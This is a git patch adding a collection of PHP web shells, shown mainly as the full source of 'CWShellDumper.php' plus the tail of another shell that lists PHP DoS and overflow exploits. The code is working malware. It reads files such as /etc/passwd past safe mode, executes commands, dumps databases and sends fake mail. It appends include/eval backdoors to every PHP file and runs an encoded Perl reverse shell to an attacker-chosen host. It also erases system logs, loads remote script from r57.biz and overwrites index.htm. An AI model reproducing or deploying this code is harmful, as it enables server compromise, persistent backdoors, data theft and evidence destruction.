sr(10,"",$fs.in('hidden','cmd',0,'dos26').in('submit','submit',0,'DoS [glob()] 2 (PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos27').in('submit','submit',0,'DoS [fnmatch()](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos28').in('submit','submit',0,'BoF [imagepsloadfont()](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos29').in('submit','submit',0,'BoF mSQL [msql_connect](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos30').in('submit','submit',0,'BoF [chunk_split()](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos31').in('submit','submit',0,'BoF [php_win32sti.dl](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos32').in('submit','submit',0,'BoF [php_iisfunc.dll](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos33').in('submit','submit',0,'BoF [ntuser_getuserlist()](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos34').in('submit','submit',0,'DoS [com_print_typeinfo()](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos35').in('submit','submit',0,'BoF [iconv()](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos36').in('submit','submit',0,'BoF [iconv_m_d_headers()](PHP<5.2.x)').$fe); +echo $te."</td><td valign=top width=25%>".$ts; +echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>"; +echo sr(10,"",$fs.in('hidden','cmd',0,'dos37').in('submit','submit',0,'BoF [iconv_mime_decode()](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos38').in('submit','submit',0,'BoF [iconv_strlen()](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos39').in('submit','submit',0,'BoF [printf()](PHP<5.2.5) and prior').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos40').in('submit','submit',0,'BoF [mssql_connect(), mssql_pconnect()](PHP<4.4.6) and prior').$fe); +/*echo sr(10,"",$fs.in('hidden','cmd',0,'dos').in('submit','submit',0,'BoF [()](PHP<5.2.x)').$fe);*/ +echo $te."</td></tr></div></table>"; +echo $fs.$table_up1.div_title($lang[$language.'_text211'],'id11111').$table_up2.div('id11111').$ts; +echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text213']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','htacces',10,'.htaccess').ws(4).in('submit','submit',0,$lang[$language.'_butt65'])); +echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text218']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','egy_ini',10,'ini.php').ws(4).in('submit','submit',0,$lang[$language.'_butt65'])); +echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text228']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','egy_vb',10,'vb_hacker.php').ws(4).in('submit','submit',0,$lang[$language.'_butt65'])); +echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text230']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','egy_cp',10,'pass_cpanel.php').ws(4).in('submit','submit',0,$lang[$language.'_butt65'])); +echo $te.'</div>'.$table_end1.$fe; +{ + + + + + + +echo $te."</td>".$fe."</tr></div></table>"; +} + + +echo $te."</td></tr></div></table>"; +echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=tahoma size=-2><b>o---[ EgY_SpIdEr | </a> | <a egy_spider@hotmail.com>egy_spider@hotmail.com</a> developer by EgY SpIdEr ]---o</b></font></div></td></tr></table>"; +echo '</body></html>'; +?> From 7d611010673765cd3396687a3a4990b76246610e Mon Sep 17 00:00:00 2001 From: Anthony Cozamanis <anthony.cozamanis@chronicle.jp.net> Date: Wed, 16 Dec 2015 16:12:10 +0800 Subject: [PATCH 2/2] Few new php shells --- php/CWShellDumper.php | 773 ++++++++++ php/aspx.php | 2590 ++++++++++++++++++++++++++++++++++ php/cgi.php | 690 +++++++++ php/cmd.php | 1102 +++++++++++++++ php/dq.php | 3112 +++++++++++++++++++++++++++++++++++++++++ php/ekin0x.php | 607 ++++++++ php/kacak.php | 903 ++++++++++++ php/links.php | 78 ++ php/liz0zim.php | 34 + php/login.php | 583 ++++++++ php/sadrazam.php | 1973 ++++++++++++++++++++++++++ 11 files changed, 12445 insertions(+) create mode 100644 php/CWShellDumper.php create mode 100644 php/aspx.php create mode 100644 php/cgi.php create mode 100644 php/cmd.php create mode 100644 php/dq.php create mode 100644 php/ekin0x.php create mode 100644 php/kacak.php create mode 100644 php/links.php create mode 100644 php/liz0zim.php create mode 100644 php/login.php create mode 100644 php/sadrazam.php diff --git a/php/CWShellDumper.php b/php/CWShellDumper.php new file mode 100644 index 0000000..937f6c4 --- /dev/null +++ b/php/CWShellDumper.php @@ -0,0 +1,773 @@ +<?php +$entry_line="r57.biz"; +$fp = fopen("index.htm", "w"); +fputs($fp, $entry_line); +fclose($fp); +#GreetZ:SultanMehmed + +// Variables + $info = @$_SERVER['SERVER_SOFTWARE']; + $page = @$_SERVER['SCRIPT_NAME']; + $site = getenv("HTTP_HOST"); + $uname = php_uname(); + $smod = ini_get('safe_mode'); + if ($smod == 0) { $safemode = "<font color='lightgreen'>KAPALI</font>"; } + else { $safemode = "<font color='red'>ACIK</font>"; } + $dir = @realpath($_POST['dir']); + $mkdir = @$_POST['makedir']; + $mydir = @$_POST['deletedir']; + $cmd = @$_GET['cmd']; + $host = @$_POST['host']; + $proto = @$_POST['protocol']; + $delete = @$_POST['delete']; + $phpeval = @$_POST['php_eval']; + $db = @$_POST['db']; + $query = @$_POST['query']; + $user = @$_POST['user']; + $pass = @$_POST['passd']; + $myports = array("21","22","23","25","59","80","113","135","445","1025","5000","5900","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018"); + + + $quotes = get_magic_quotes_gpc(); +if ($quotes == "1" or $quotes == "on") + { + $quot = "<font color='red'>ACIK</font>"; + } + else + { + $quot = "<font color='lightgreen'>KAPALI</font>"; + } + // Perms + function getperms($fn) +{ +$mode=fileperms($fn); +$perms=''; +$perms .= ($mode & 00400) ? 'r' : '-'; +$perms .= ($mode & 00200) ? 'w' : '-'; +$perms .= ($mode & 00100) ? 'x' : '-'; +$perms .= ($mode & 00040) ? 'r' : '-'; +$perms .= ($mode & 00020) ? 'w' : '-'; +$perms .= ($mode & 00010) ? 'x' : '-'; +$perms .= ($mode & 00004) ? 'r' : '-'; +$perms .= ($mode & 00002) ? 'w' : '-'; +$perms .= ($mode & 00001) ? 'x' : '-'; +return $perms; +} + // milw0rm Search (locushell) + +$Lversion = @php_uname('r'); +$OSV = @php_uname('s'); +if(eregi('Linux',$OSV)) +{ +$Lversion=substr($Lversion,0,6); +$millink="http://milw0rm.com/search.php?dong=Linux Kernel".$Lversion; + +}else{ +$Lversion=substr($Lversion,0,3); +$millink="http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion; +} +if(isset($_POST['milw0'])) { echo "<script>window.location='".$millink."'</script>"; } + //Space + $spacedir = @getcwd(); + $free = @diskfreespace($spacedir); + +if (!$free) {$free = 0;} + $all = @disk_total_space($spacedir); +if (!$all) {$all = 0;} +function view_size($size) +{ + if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size; +} +$percentfree = intval(($free*100)/$all); + + +// PHPinfo +if(isset($_POST['phpinfo'])) +{ +die(phpinfo()); +} + + +// Make File + + $name = htmlspecialchars(@$_POST['names']); + $src = @$_POST['source']; + if(isset($name) && isset($src)) + { + if($_POST['darezz'] != realpath(".")) { $name = $_POST['darezz'].$name; } + $ctd = fopen($name,"w+"); + fwrite($ctd, $src); + fclose($ctd); + echo "<script>alert('Uploaded')</script>"; + } + +// Upload File + $path = @$_FILES['ffile']['tmp_name']; + $name = @$_FILES['ffile']['name']; + if(isset($path) && isset($name)) +{ +if($_POST['dare'] != realpath(".")) { $name = $_POST['dare'].$name; } + if(move_uploaded_file($path, $name)) + { + echo "<script>alert('Uploaded')</script>"; + } + else + { + echo "<script>alert('Error')</script>"; +} } + +// Delete File + + + if(isset($delete) && $delete != $dir) +{ + if(file_exists($delete)) + { + unlink($delete); + echo "<script>alert('File Deleted')</script>"; + } + +} + +// Database + + if(isset($db) && isset($query) && isset($_POST['godb'])) +{ + $mysql = mysql_connect("localhost", $user, $pass)or die("<script>alert('Connection Failed')</script>"); + $db = mysql_select_db($db)or die(mysql_error()); + $queryz = mysql_query($query)or die(mysql_error()); +if($query) { echo "<script>alert('Done')</script>"; } +else { echo "<script>alert('Error')</script>"; } +} + +// Dump Database [pacucci.com] +if(isset($_POST['dump']) && isset($user) && isset($pass) && isset($db)){ +mysql_connect('localhost', $user, $pass); +mysql_select_db($db); +$tables = mysql_list_tables($db); +while ($td = mysql_fetch_array($tables)) +{ +$table = $td[0]; +$r = mysql_query("SHOW CREATE TABLE `$table`"); +if ($r) +{ +$insert_sql = ""; +$d = mysql_fetch_array($r); +$d[1] .= ";"; +$SQL[] = str_replace("\n", "", $d[1]); +$table_query = mysql_query("SELECT * FROM `$table`"); +$num_fields = mysql_num_fields($table_query); +while ($fetch_row = mysql_fetch_array($table_query)) +{ +$insert_sql .= "INSERT INTO $table VALUES("; +for ($n=1;$n<=$num_fields;$n++) +{ +$m = $n - 1; +$insert_sql .= "'".mysql_real_escape_string($fetch_row[$m])."', "; +} +$insert_sql = substr($insert_sql,0,-2); +$insert_sql .= ");\n"; +} +if ($insert_sql!= "") +{ +$SQL[] = $insert_sql; +} +} +} +$dump = "-- Database: ".$_POST['db'] ." \n"; +$dump .= "-- CWShellDumper v3\n"; +$dump .= "-- r57.biz\n"; +$dumpp = $dump.implode("\r", $SQL); +$name = $db."-".date("d-m-y")."cyberwarrior.sql"; +Header("Content-type: application/octet-stream"); +Header("Content-Disposition: attachment; filename = $name"); +echo $dumpp; +die(); +} + +// Make Dir +if(isset($mkdir)) { + +mkdir($mkdir); +if($mkdir) { echo "<script>alert('Tamamdýr.')</script>"; } } + +// Delete Directory + +if(isset($mydir) && $mydir != "$dir") { +$d = dir($mydir); +while($entry = $d->read()) { + if ($entry !== "." && $entry !== "..") { + unlink($entry); + } +} +$d->close(); +rmdir($mydir); + +} + +//Infect Files [RFI] + +if(isset($_POST['inf3ct'])) +{ +foreach (glob("*.php") as $lola) +{ +$dira = '.'; +$asdi = fopen($lola, 'a+'); +@fwrite($asdi, ' +<?php +include($_GET[\'pwn\']); +?>'); +@fclose($asdi); +} +if($asdi) +{ +$textzz = '<font size=2 color=lightgreen>Oldu:<br> ?pwn=[shell]</font>'; +} +else { +$textzz = '<font size=2 color=red>HATA! (Permlere Dikkat Et..)</font>'; +} +} + +//Infect Files [Eval] +if(isset($_POST['evalinfect'])) +{ +foreach (glob("*.php") as $lal) +{ +$dira = '.'; +$axd = fopen($lal, 'a+'); +@fwrite($axd, ' +<?php +eval(stripslashes($_GET[\'eval\'])); +?>'); +@fclose($axd); +} +if($axd) +{ +$textz0 = '<font size=2 color=lightgreen>Oldu:<br> ?eval=[eval]</font>'; +} +else { +$textz0 = '<font size=2 color=red>HATA! (Permler IZIn Vermior..)</font>'; +} +} + +// Images + if(@$_GET['com'] == "image") + { + $images = array( + "folder"=> "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABmJLR0QAAAAAAAD5Q7t/AAAACXBIWXMAAA3XAAAN1wFCKJt4AAAAB3RJTUUH1QsKEjkN+d1wUAAAAX9JREFUOMulkU2IUlEYhp9jKv5AposQWgRBtA6CmSCa5SzjYhG0qYggiP6Y3WxmtrMIol1QM84qRKRlSVC2bBcYRpuIIigFC7F7j0fP/WZx7QriBc2XDw6cw/e8L+9Rly6XtorF4jZTMsYE58Dc2tvdf0KE1J17t+X61RszH7X2eLb3lF6vd6VaqT2PBJSci7Q+taJMeNt4M331qFqpPQCIA6TTGY7k8pEA50IpcFMKpRS1F9X7QAAwxuB5Lq8/9ml2Msylww5nbjpSSOnPYYJmJ8PjjXW0sXMxUslD3H1YPxUH8DwXgJ+/NV/af+cCnDiaBSCmtSadnjP6DMVc1w0T/BfgXwdLARZNYK2PHgZlh7+QiPkIICIopRARRMAXwVphaH3MSBiMLEMr5LLJCcDzXI7nBnT7hh9dD0ThI4wHERAEkTEYGFmZAH512pw+e44PX/+MlwJ3EfARBAUiYaqVkwXqL1+R19/L6vy1nYabOLa2aHnZ4bf378qbqyyrA8KHtMqnsOL4AAAAAElFTkSuQmCC", + "file"=> "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABGdBTUEAAK/INwWK6QAAABl0RVh0U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAP3SURBVHjaYtxx5BYDIwMUMDLESIjyTeRiZ2H4//8/WOgvEP/69Zfh5+9/DI8ev3jx9NGDKAYmpovc/MIMc6e0MwAEEAszEyPDP6h+pn9/ORWkBYV4OVlhRjL8Bprz5etfhncfPjP8l5IQ4uVh33Lt2i1foAUXQPIAAcSirC3F8PoXI8N7JmaGrw9f//z67S8DCzMrAwvjPwZWVkYGpv+MDIxAJzIB5VlZGBgsjTRlWFiYN99//BpsCEAAsbCxsTCwMjEx/P3NZPmcSTB2/UNmBsb//xi+fv3DoCH8l8FFlZmBg4WVgZ2dleHHr98Ml27cY/jPwCzDxc23BejLQIAAAEEAvv8CAwH/APT1/l/l7P+/IRwHREEtBQAmJgIA+g4GAKHUBgCGufQA9fb1AAgFAwASEAwA9ff+AOjr8QAFBgob/Pz9YQKI6ePP/7qH7zBP5GJhYtfjZ2KQAnqfCehUoIUMnFzMDBuv8TAsOPSeAWgk0GvMDNxc7AxCvOwM4sI8QJf8/wsQQCzbb/9L/vGLgd9KkoHh03cGhku/GBhefmVg+AjEQHFgxDAzrDr4ncFK/jkDDxcfMDwYGbi4OBhYgF4HBs1/gABiOnf9p/mrT78ZXv9hYHj3m4Hh8hMGhquPGBgevmRgeP+NgeHP5+8Mty98ZLj++D0DK/N/Bm4OdmDA/mDg52QDxztAADG9fPyDb/eRDwzTjvxmAJrBYAx0yV+gzfeBBvz68pfh64PXDOxcrAx//4Jih4mBDRgVPDxAlwDZoNgBCCCmPz//Pn15+iXDiyufGF5+ANnAwMD66yfDzcNPGIS/vWb4+uITAycvE1icmQUYlaysDF8/vwMGKhM4nQAEENOz84t2i4mJMHiYcDNI8DMyCAJdZi4FjB9LVgZ9VW4GEWleBgWJHwxSQEOYgdH5H5jsRETFGf4D0wUorQIEENODQ5MWq2h9uSUty8EgJcDAIMfOwOCpy8FQkibOoKbOy+AaKMbgYfiRQVxEDOhkFgZmYJp58fwJMGj/AkOAkQEggFh+fHj54uLq1PhTurMXPXqkpsr5+QMDDzczA5cML8OzN58YBN+dY7DSEGLgFxJl+AUMh3///jDIysgDww/kgv8MAAHEDPLH19ePnpzcsmzLzduvFT4zKGucOP+M4ffnZwyKrI8ZbDVEGBSUNYDqgRr+/WdgAtL37txgEAZ6Y9XKlacAAogFlmn+fnt3X+bv6e0L6tr8P757B4yJvwzcvIIMbBycDH+Bnv0NzI3ADMHw5+8/Bg1dYwYmNmB+YWXlAAggRE4GxsnUeev09+zalvDsySOgwYzgDA2y9T/Df3juBDFBPBYWNsbbN86fBAgwAD3nU17W2F2kAAAAAElFTkSuQmCC", + "floppy"=> "R0lGODlhECAQILMgIB8jVq2yyI0csGVuGcjL2v///9TY405WfqOmvjI+bHoaoQsMQxR+uubn7bu+0f///yH5BAEgIA8gLCAgICAQIBAgIAR/8CHEHlVq6HMZNEUYJGFZMiACFtxpCiBDHgLjEwogzLfZDAuBw0AsEn0eIAKocAR+E0Yls1koAn2skjLFDA7WQKlBJh6z4AEiVDZneDDFrNEwE95QRHwgaFOdSlx6CwcKdndOUQxxJgZgFgIYCjALCQN/eRUWIAsPIHggoSCdESA7" + ); +header("Content-type: image/gif"); +header("Cache-control: public"); +header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); +header("Cache-control: max-age=".(60*60*24*7)); +header("Last-Modified: ".date("r",filemtime(__FILE__))); +$image = $images[$_GET['img']]; + echo base64_decode($image); + } +//File List + + chdir($dir); + if(!isset($dir)) { $dir = @realpath("."); } + if($dir != "/") { $dir = @realpath("."); } else { $dir = "."; } + if (substr($dir,-1) != DIRECTORY_SEPARATOR) {$dir .= DIRECTORY_SEPARATOR;} + $pahtw = 0; + $filew = 0; + $num = 1; + + if (is_dir($dir)) + { + if ($open = opendir($dir)) + { + if(is_dir($dir)) { + $typezz = "DIR"; + $pahtw++; + } + while (($list = readdir($open)) == true) + { + + if(is_dir($list)) { + $typezz = "DIR"; + $pahtw++; + @$listf.= '<tr><td valign=top><img src=?com=image&img=folder><font size=2 face=Verdana>['.$list.']<td valign=top><font size=2 face=Verdana>'.$typezz.'</font></td><td valign=top></td><td valign=top><font size=2 face=Verdana>' . getperms($list) .'</font></td></tr>'; } +else { + + $lolz = filesize($list) / 1024; + $lolx = intval($lolz); + if($lolx == 0) { $lolx = 1; } + $typezz = "DOSYA"; + $filew++; + $listz = "/".$list; + if(eregi($page,$listz)) { @$listf.= '<tr><td valign=top><img src=?com=image&img=file><font size=2 face=Verdana color=yellow>'.$list.'<td valign=top><font size=2 face=Verdana>'.$typezz.'</td><td valign=top width=15%><font size=2 face=Verdana>' . $lolx .' Kb</td><td valign=top><font size=2 face=Verdana>' . getperms($list) . '</font></tr>'; } + elseif(eregi('config',$listz) && eregi('.php',$listz)) { @$listf.= '<tr><td valign=top><img src=?com=image&img=file><font size=2 face=Verdana><b>'.$list.'</b><td valign=top><font size=2 face=Verdana>'.$typezz.'</td><td valign=top width=15%><font size=2 face=Verdana>' . $lolx .' Kb</td><td valign=top><font size=2 face=Verdana>' . getperms($list) . '</font></tr>'; } + else {@$listf.= '<tr><td valign=top><img src=?com=image&img=file><font size=2 face=Verdana>'.$list.'<td valign=top><font size=2 face=Verdana>'.$typezz.'</td><td valign=top width=15%><font size=2 face=Verdana>' . $lolx .' Kb</td><td valign=top><font size=2 face=Verdana>' . getperms($list) . '</font></tr>'; } } + + } + closedir($open); + + } +$fileq = $pahtw + $filew; } + + + + +echo "<html> +<head> +<style> +table.menu { +border-width: 0px; + border-spacing: 1px; + border-style: solid; + border-color: #a6a6a6; + border-collapse: separate; + background-color: rgb(98, 97,97); +} +table.menuz { +border-width: 0px; + border-spacing: 1px; + border-style: solid; + border-color: #a6a6a6; + border-collapse: separate; + background-color: rgb(98, 97,97); +} +table.menu td { + border-width: 1px; + padding: 1px; + border-style: none; + border-color: #333333; + background-color: #000000; + -moz-border-radius: 0px; +} +table.menuz tr { + border-width: 1px; + padding: 1px; + border-style: none; + border-color: #333333; + background-color: #000000; + -moz-border-radius: 0px; +} + +table.menuz tr:hover { + background-color: #111111; +} +input,textarea,select { +font: normal 11px Verdana, Arial, Helvetica, sans-serif; +background-color:black; +color:#a6a6a6; +border: solid 1px #363636; +} +</style> + +</head> +<SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT> +<body bgcolor='#000000' text='#ebebeb' link='#ebebeb' alink='#ebebeb' vlink='#ebebeb'> +<table style='background-color:#333333; border-color:#a6a6a6' width=100% border=0 align=center cellpadding=0 cellspacing=0> +<tr><td> +<center><b><font size='6' face='Webdings'>ü</font> +<font face='Verdana' size='5'><a href='".@$_SERVER['HTTP_REFERER']."'>~ CWShell ~</font></a> +<font size='6' face='Webdings'>ü</font></b> +</center> +<SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT> +</td></tr></table><table class=menu width=100%<tr><td> +<font size='1' face='Verdana'><b>Site: </b><u>$site</u> <br> +<b>Server Name: </b><u>" . $_SERVER['SERVER_NAME'] . "</u> <br> +<b>Server Bilgisi : </b> <u>$info</u> <br> +<b>Uname -a:</b> <u>$uname</u> <br> +<b>Klasör:</b> <u>" . $_SERVER['DOCUMENT_ROOT'] . "</u> <br> +<b>Safe Mode:</b> <u>$safemode</u> <br> +<b>Sihirli Sozler:</b> <u>$quot</u> <br> +<b>Sayfa:</b> <u>$page</u><br> +<b>Boþ Alan:</b> <u>" . view_size($free) . " [ $percentfree% ]</u> <br> +<b>Toplam Alan:</b> <u>" . view_size($all) . "</u> <br> +<b>IP:</b> <u>" . $_SERVER['REMOTE_ADDR'] ."</u> - Server IP:</b> <a href='http://whois.domaintools.com/". $_SERVER['SERVER_ADDR'] ."'>".$_SERVER['SERVER_ADDR']."</a></td></tr> +<tr><td><form method='post' action=''> +<center><input type=submit value='File List' name=filelist> - <input type=submit value='View PhpInfo' name=phpinfo> - <input type=submit value='Encoder' name='encoder'> - <input type='submit' value='Send Fake Mail' name='mail'> - <input type='submit' value='Cmd Execution' name='commex'> - <input type='submit' name='logeraser' value='Logs Eraser'> - <input type='submit' name='connectback' value='Connect Back'> - <input type='submit' name='safemodz' value='Safe Mode Bypass'> - <input type='submit' name='milw0' value='Milw0rm Search'></center></td></tr>"; +// Safe Mode Bypass +if(isset($_POST['safemodz'])) +{ +echo "<tr><td valign=top width=50%> +<center><b><font size='2' face='Verdana'>Safe-Mode Bypass[Dosyalar]<br></font></b> +<form action='' method='post'> + <font size='1' face='Verdana'>Dosya adý:</font><br> <input type='text' name='filew' value='/etc/passwd'> <input type='submit' value='Dosyayý Oku' name='redfi'><br> + </td><tr> +<td valign=top> +<center><b><font size='2' face='Verdana'>Safe-Mode Bypass [Klasörler]<br></font></b> + <form method='post' action=''> + <font size='1' face='Verdana'>Klasör:</font><br> + <input type='text' name='directory'> <input type='submit' value='Listele' name='reddi'>"; + } + // Safe Mode Bypass: File +if(isset($_POST['redfi'])) +{ + $test=''; + $tempp= tempnam($test, "cx"); + $get = htmlspecialchars($_POST['filew']); + if(copy("compress.zlib://".$get, $tempp)){ + $fopenzo = fopen($tempp, "r"); + $freadz = fread($fopenzo, filesize($tempp)); + fclose($fopenzo); + $source = htmlspecialchars($freadz); + echo "<tr><td><center><font size='1' face='Verdana'>$get</font><br><textarea rows='20' cols='80' name='source'>$source</textarea>"; + unlink($tempp); + } else { + echo "<tr><td><center><font size='1' color='red' face='Verdana'>HATA</font>"; + } + +} + +// Safe Mode Bypass: Directory + if(isset($_POST['reddi'])){ + +function dirz() +{ +$dirz = $_POST['directory']; +$files = glob("$dirz*"); + +foreach ($files as $filename) { + echo "<tr><td><font size='1' face='Verdana'>"; + echo "$filename\n"; + echo "</font><br>"; +} +} +echo "<br>"; dirz(); +} + +// Connect Back +if(isset($_POST['connectback'])) +{ +echo " +<tr><td> +<center><font size='2' face='Verdana'><b>Back-Connect</b><br></font> +<form method='post' action=''><input type='text' name='connhost' size='15'value='target'> <input type='text' name='connport' size='5' value='port'> <input type='submit' name='connsub' value='Run'></form>"; +} +if(isset($_POST['logeraser'])) +{ +echo "<tr><td> +<center><b><font size='2' face='Verdana'>:: OS ::<br></font></b> + <select name=functionp> + <option>linux</option> + <option>sunos</option> + <option>aix</option> + <option>irix</option> + <option>openbsd</option> + <option>solaris</option> + <option>suse</option> + <option>lampp</option> + <option>debian</option> + <option>freebsd</option> + <option>misc</option> + </select><br><input type='submit' name='runer' value='Erase'></table>"; + } + +// Connect Back +if(isset($_POST['connsub'])) +{ +$sources = base64_decode("CiMhL3Vzci9iaW4vcGVybAp1c2UgU29ja2V0OwoKJGV4ZWN1dGU9J2VjaG8gIkhlcmUgaSBhbSI7ZWNobyAiYHVuYW1lIC1hYCI7ZWNobyAiYHVwdGltZWAiOy9iaW4vc2gnOwoKJHRhcmdldD0kQVJHVlswXTsKJHBvcnQ9JEFSR1ZbMV07CiRpYWRkcj1pbmV0X2F0b24oJHRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOwokcGFkZHI9c29ja2FkZHJfaW4oJHBvcnQsICRpYWRkcikgfHwgZGllKCJFcnJvcjogJCFcbiIpOwokcHJvdG89Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOwpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7CmNvbm5lY3QoU09DS0VULCAkcGFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsKb3BlbihTVERJTiwgIj4mU09DS0VUIik7Cm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsKb3BlbihTVERFUlIsICI+JlNPQ0tFVCIpOwpzeXN0ZW0oJGV4ZWN1dGUpOwpjbG9zZShTVERJTik7CmNsb3NlKFNURE9VVCk7IA=="); +$openz = fopen("cbs.pl", "w+")or die("Error"); +fwrite($openz, $sources)or die("Error"); +fclose($openz); +$aids = passthru("perl cbs.pl ".$_POST['connhost']." ".$_POST['connport']); +unlink("cbs.pl"); +} +if(isset($_POST['connsub'])) { echo "<tr><td><font color='lightgreen' face='Verdana' size='2'>Done.</font>"; } + + // Logs Eraser +if(isset($_POST['runer'])) +{ +echo "<tr><td><center><textarea cols='30' rows='2'>"; +$erase = base64_decode("IyF1c3IvYmluL3BlcmwNCiMgQ1dTSGVsbA0KICAgICAgIGNob21wKCRvcyA9ICRBUkdWWzBdKTsNCg0KICAgICAgICAgICAgICAgIGlmKCRvcyBlcSBcIm1pc2NcIil7ICNJZiBtaXNjIHR5cGVkLCBkbyB0aGUgZm9sbG93aW5nIGFuZCBzdGFydCBicmFja2V0cw0KICAgICAgICAgICAgIHByaW50IFwiWytdbWlzYyBTZWxlY3RlZC4uLlxcblwiOyAgIA0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgcHJpbnQgXCI8dHI+WytdTG9ncyBMb2NhdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICAkYSA9IHVubGluayBAbWlzYzsgICANCiAgICAgICAgICAgICBzbGVlcCAxOw0KCQkJIA0KICAgICAgICAgICAgaWYoJGEpIHsgcHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7IH0NCgkJCWVsc2UgeyBwcmludCBcIlstXUVycm9yXCI7IH0NCiAgICAgICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgaWYoJG9zIGVxIFwib3BlbmJzZFwiKXsgI0lmIG9wZW5ic2QgdHlwZWQsIGRvIHRoZSBmb2xsb3dpbmcgYW5kIHN0YXJ0IGJyYWNrZXRzDQogICAgICAgICAgICAgcHJpbnQgXCJbK11vcGVuYnNkIFNlbGVjdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICBwcmludCBcIlsrXUxvZ3MgTG9jYXRlZC4uLlxcblwiOyAgIA0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgJGIgPSB1bmxpbmsgQG9wZW5ic2Q7ICAgDQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgIGlmKCRiKSB7cHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7ICAgfQ0KCQkJZWxzZSB7IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICBpZigkb3MgZXEgXCJmcmVlYnNkXCIpeyAjSWYgZnJlZWJzZCB0eXBlZCwgZG8gdGhlIGZvbGxvd2luZyBhbmQgc3RhcnQgYnJhY2tldHMNCiAgICAgICAgICAgICBwcmludCBcIlsrXWZyZWVic2QgU2VsZWN0ZWQuLi5cXG5cIjsgICANCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgIHByaW50IFwiWytdTG9ncyBMb2NhdGVkLi4uXFxuXCI7ICAgDQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICAkYyA9IHVubGluayBAZnJlZWJzZDsgICANCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgIGlmKCRjKSB7IHByaW50IFwiWytdTG9ncyBTdWNjZXNzZnVsbHkgRGVsZXRlZC4uLlxcblwiOyB9DQoJCQkgZWxzZSB7IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICBpZigkb3MgZXEgXCJkZWJpYW5cIil7ICNJZiBEZWJpYW4gdHlwZWQsIGRvIHRoZSBmb2xsb3dpbmcgYW5kIHN0YXJ0IGJyYWNrZXRzDQogICAgICAgICAgICAgcHJpbnQgXCJbK11kZWJpYW4gU2VsZWN0ZWQuLi5cXG5cIjsNCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgIHByaW50IFwiWytdTG9ncyBMb2NhdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICAkZCA9IHVubGluayBAZGViaWFuOyAgIA0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgaWYoJGQpIHsgcHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7IH0NCgkJCSAgZWxzZSB7IHBy